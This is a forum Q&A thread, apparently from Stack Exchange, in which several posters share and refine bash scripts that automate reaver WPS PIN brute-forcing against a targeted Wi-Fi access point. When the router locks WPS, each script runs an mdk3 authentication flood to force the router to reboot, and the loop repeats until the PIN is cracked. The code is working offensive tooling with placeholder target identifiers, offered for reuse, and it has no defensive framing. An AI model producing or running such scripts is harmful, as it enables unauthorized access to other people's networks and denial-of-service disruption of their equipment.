Bash script for reaver to unlock wps-locked status

Question

First of all, sorry for my poor poor english. I'm trying to write a bash script in order to perform AP WPS cracking using reaver. The problem is that after trying some WPS-PINs, the AP lock the WPS so I reaver is not usefull.

To solve this, I perform a mdk3 attack to force the AP to reboot and be able to attack it again (after reboot, the WPS restarts in unlocked state).

The problem with this approach is that:

1. I have to be in front of the PC locking when the AP is locked and
2. making an mdk3 attack, stop it when the AP is rebooted and performing again the reaver attack. The solution to this is obviously a script.

I wrote the following lines which should solve this.

I have to say that I'm a total noob in bash scripting, so the script is not "professional", it just a "workarround" to solve my problem.

#!/bin/bash

while true; do
    # Switch to the correct channel and save it into $channel
    echo Detecting AP channel
    timeout 25 reaver -i wlan0mon -e AP_SSID -b AP_BSSID -q # Switch to the AP channel
    rm ap_channel 2> /dev/null
    touch ap_channel
    timeout 5 aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon > ap_channel
    channel="$(head -1 ap_channel | tail -c 2 | head -c 1)"
    rm ap_channel

    # Attacks the AP while it isn't wps-locked
    rm ap_status 2> /dev/null
    timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
    while [ -z "$(grep Locked ap_status)" ]; do
        echo Performing reaver attack
        aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon
        timeout 30 reaver -i wlan0mon -e AP_SSID -b AP_BSSID --no-nacks -vv -s REAVER_PREV_SESSION.wpc -w -A -g 1 -C gnome-screenshot -f
        rm ap_status
        timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
    done

    # The AP is now locked. Performs a mdk3 attack (in order to reboot the AP) while the AP wps-status is Locked
    ((mdk3 wlan0mon a -a AP_BSSID -m) 2>&1) > /dev/null &
    mdk3_pid=$!
    rm ap_status
    timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
    while [ -n "$(grep Locked ap_status)" ]; do
        echo Trying to reboot the AP
        rm ap_status
        timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
    done

    # The AP is now rebooted. Kill the mdk3 process and wait 2 mins to restart reaver attack
    kill -9 $mdk3_pid
    echo AP rebooted. Waiting 2 mins till AP init
    sleep 120
done

The problem in this script is that the stdout redirection that I use for airodump output run different if I execute it directly in the command line than if I execute it inside the script.

timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status

I need a way to execute the line above within the script as if I execute it directly in the tty. I can't do this using exec because I need to continue with the script.

NOTE: I can't use the -w option for airodump-ng because it doesn't save the WPS status.

Could someone please help me with this?

Answer 1

I finally got it. I found a workaround to solve this problem, redirectirng the stdout of the commands to files. I post the script, maybe, someone could use it.

!/bin/bash

while true; do

rm attack
rm ap_status
rm ap_channel

# Detects the AP channel
echo Detecting AP channel
timeout 45 reaver -i wlan0mon -e AP_SSID -b AP_BSSID -vv > ap_channel # Switch to the AP channel
timeout 15 aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon > ap_channel
channel="$(head -1 ap_channel | tail -c 3 | head -c 2)"
rm ap_channel
echo Detected AP channel $channel

# Attacks the AP using reaver till the AP locks the WPS
((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status &
airodump_pid=$!
sleep 10
kill -9 $airodump_pid

while [ -z "$(grep Locked ap_status)" ]; do
    echo Performing reaver attack
    aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon
    timeout 30 reaver -i wlan0mon -e AP_SSID -b AP_BSSID --no-nacks -vv -s PREV_SESSION.wpc -w -A -g 1 -C gnome-screenshot -f
    ((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status &
    airodump_pid=$!
    sleep 10
    kill -9 $airodump_pid
done

# Force a reboot in the AP to unlock WPS
((mdk3 wlan0mon a -a AP_BSSID -m) 2>&1) > attack &
mdk3_pid=$!

((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status &
airodump_pid=$!
sleep 10
kill -9 $airodump_pid

while [ -n "$(grep Locked ap_status -m 1)" ]; do
    echo Trying to reboot the AP
    ((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status &
    airodump_pid=$!
    sleep 10
    kill -9 $airodump_pid
done

# The AP is now rebooted. Kill the mdk3 process and wait 2 mins to restart reaver attack
kill -9 $mdk3_pid
echo AP rebooted. Waiting 5 mins till AP init
rm attack
rm ap_status
sleep 300

done

The delays are set to longs, but they are OK. That depends on the AP, you can change them.

For using the script, aircrack, reaver (last version, the one which has the --wps option), timeout and mdk3 packages are needed.

If someone who knows about bash scripting want to modify the script and upload a better one, that will be great!

Answer 2

My variant. Fixed delay replace dynamic wait. Count try pin and wait time.

Replace "-C gnome-screenshot -f" to you screenshot programm or remove it.

!/bin/bash

while true; do

rm attack 2> null
rm ap_status 2> null
rm ap_channel 2> null
rm assoc 2> null

AP_SSID="TARGET_ESSID"
AP_BSSID="TARGET_BSSID"
MY_MAC="YOU_MAC"
MON_INTERFACE=wlan0mon
PREV_SESS_FILE="PREV_SESSION_FILE.wpc"
countTryPin=0
countFile=totalTryPinCount # count file to store total try pin
waitTryReboot=0 # count wait time AP rebooting (DDOS MDK3)
waitReboot=0 # count wait time AP recovery after rebooting
touch $countFile

echo -e -n "\n\nDetect channel"

touch assoc
((reaver -i $MON_INTERFACE -e $AP_SSID -b $AP_BSSID -A -s $PREV_SESS_FILE) 2>&1) > assoc &
assoc_pid=$!

while [ -z "$(grep Associated assoc)" ]; do
    sleep 3
    echo -n .
done

echo -e "\n\n"
kill -9 $assoc_pid
wait $assoc_pid 2> null
rm assoc

echo -n "Wait association"
((aireplay-ng -1 0 -e $AP_SSID -a $AP_BSSID -h $MY_MAC $MON_INTERFACE) 2>&1) > ap_channel &
    ap_channel_pid=$!
while [ -z "$(grep successful ap_channel)" ]; do
        sleep 1
        echo -n "."
done

channel="$(head -1 ap_channel | tail -c 3 | head -c 2)"
echo -e "\n\Channel set to $channel\n\n"
rm ap_channel

touch ap_status
echo -n -e "\nCheck AP WPS lock"
while [ -z "$(grep $AP_SSID ap_status)" ]; do
    ((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID -c $channel) 2>&1) > ap_status &
    airodump_pid=$!
    echo -n .
    sleep 1
    kill -9 $airodump_pid
    wait $airodump_pid 2> null
done

echo -e "\n\n"
((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID -c $channel) 2>&1) > ap_status &
    airodump_pid=$!

while [ -z "$(grep $AP_SSID ap_status -m 1)" ]; do
    sleep 2
done

kill -9 $airodump_pid
wait $airodump_pid 2> null

while [ -z "$(grep Locked ap_status -m 1)" ]; do
    ((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID -c $channel) 2>&1) > ap_status &
    airodump_pid=$!
    echo -e "\n\nBegig reaver attack\n\n"
    echo -n "Wait association"
        ((aireplay-ng -1 0 -e $AP_SSID -a $AP_BSSID -h $MY_MAC $MON_INTERFACE) 2>&1) > ap_channel &
        ap_channel_pid=$!
    while [ -z "$(grep successful ap_channel)" ]; do
        sleep 1
        echo -n "."
    done
    echo -e "\n\n"
    timeout 10 reaver -i $MON_INTERFACE -e $AP_SSID -b $AP_BSSID --no-nacks -vv -s $PREV_SESS_FILE -w -A -g 1 -C gnome-screenshot -f # remove or replace "-C gnome-screenshot -f" to you screenshot programm
    countTryPin=$[countTryPin + 1]
    kill -9 $airodump_pid
    wait $airodump_pid 2> null
done


# Force a reboot in the AP to unlock WPS
((mdk3 $MON_INTERFACE a -a $AP_BSSID) 2>&1) > attack &
mdk3_pid=$!

echo -e "\n\n"
while [ -n "$(grep Locked ap_status -m 1)" ] && [ -n "$(grep $AP_SSID ap_status -m 1)" ]; do
    ((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID -c $channel) 2>&1) > ap_status &
    airodump_pid=$!
    sleep 4
    waitTryReboot=$[waitTryReboot + 4]
    echo -e -n "\rTry calling reboot AP. Wait $waitTryReboot sec."
    kill -9 $airodump_pid
    wait $airodump_pid 2> null
done

# The AP is now rebooted. Kill the mdk3 process and wait 2 mins to restart reaver attack
kill -9 $mdk3_pid
wait $mdk3_pid 2> null

totalTryPin=`cat $countFile`
totalTryPin=$(($totalTryPin + $countTryPin))
echo $totalTryPin > $countFile

echo -e "\n\n"
while [ -z "$(grep $AP_SSID ap_status)" ]; do
    # After reboot AP may be change channel. Run without channel
    ((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID) 2>&1) > ap_status &
    airodump_pid=$!
    sleep 5
    waitReboot=$[waitReboot + 5]
    echo -e -n "\rAP rebooting. Wait $waitReboot sec."
    kill -9 $airodump_pid
    wait $airodump_pid 2> null
done

rm attack
rm ap_status 
rm null
execTime=$(($SECONDS+$waitTryReboot+$waitReboot))
echo -e "\n\nDone $countTryPin try pin.\
            \nCalling reboot AP wait time $waitTryReboot sec.\
            \nAP rebooting wait time $waitReboot sec.\
            \nTotal execute time $SECONDS sec.\
            \nTotal try pin $totalTryPin\n\n"
sleep 3
SECONDS=0
done